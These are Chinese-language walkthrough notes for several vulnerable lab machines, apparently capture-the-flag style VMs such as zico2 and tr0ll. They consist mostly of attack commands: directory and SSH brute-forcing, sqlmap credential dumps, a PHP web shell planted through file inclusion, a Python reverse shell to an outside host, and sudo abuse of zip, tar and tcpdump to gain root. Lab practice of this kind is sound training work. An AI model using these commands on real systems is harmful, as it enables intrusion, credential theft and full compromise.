目录
pinkys-palace-v1,225
1.端口扫描
2.访问8080端口显示403,使用代理后尝试
gobuster进行爆破
gobuster dir -p http://192.168.43.113:31337 -u http://127.0.0.1:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
sql注入
sqlmap -u http://127.0.0.1:8080/littlesecrets-main/login.php --level=3 --proxy http://192.168.43.113:31337 --data="user=admin&pass=admin" -D pinky_sec_db -T users -C uid,user,pass --dump-all --batch --threads 10
3.ssh登录pinkymanage用户
网站根目录存在pinky的密钥,保存后登录pinky账号
cat .ultrasecret | base64 -d
将密钥复制到本地
4.提权
zico2-1,210
1.端口扫描
2.查看web服务,存在本地文件包含漏洞
目录爆破
gobuster dir -u http://192.168.43.11 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
尝试登录phpLiteAdmin
3.利用phpliteadmin漏洞写入一句话
<?php echo system($_GET["cmd"]);?> #写入一句话
http://192.168.43.11/view.php?page=../../../../../..//usr/databases/1.php&cmd=pwd
http://192.168.43.11/view.php?page=../../../../../..//usr/databases/1.php&cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.43.2",5522));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' #反弹shell
查看wordpress配置文件
4.切换至zico账号进行提权
zip提权
touch /tmp/exploit
sudo -u root zip /tmp/exploit.zip /tmp/exploit -T --unzip-command="sh -c /bin/bash"
tar提权
sudo /bin/tar cf /dev/null /pwnd --checkpoint=1 --checkpoint-action=exec=/bin/bash
lord-of-the-root-101,129
1.端口扫描和端口碰撞
hping3 -S 192.168.43.170 -p 1 -c 1
hping3 -S 192.168.43.170 -p 2 -c 1
hping3 -S 192.168.43.170 -p 3 -c 1
2.查看1337端口
robots页面有base64编码内容,进行解码
3.sqlmap爆破数据库
sqlmap -o -u "http://192.168.43.170:1337/978345210/index.php" --forms -D Webapp -T Users -C id,username,password --dump --batch
4.ssh登录
5.提权
tr0ll-1,100
1.端口扫描
2.利用ftp
3.分析pcap包
4.下载分析文件
访问0x0856BF目录
hydra爆破ssh
hydra -L user.txt -p pass.txt 192.168.43.11 ssh
5.提权
web-developer-1,288
1.端口扫描
2.目录爆破,访问ipdata
3.wireshark分析analyze.cap
查看http协议中的post请求
4.ssh登录,提权获取flag
webdeveloper@webdeveloper:/tmp$ touch exploit
webdeveloper@webdeveloper:/tmp$ echo 'cat /root/flag.txt' > /tmp/exploit
webdeveloper@webdeveloper:/tmp$ chmod +x /tmp/exploit
webdeveloper@webdeveloper:/tmp$
webdeveloper@webdeveloper:/tmp$ sudo tcpdump -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root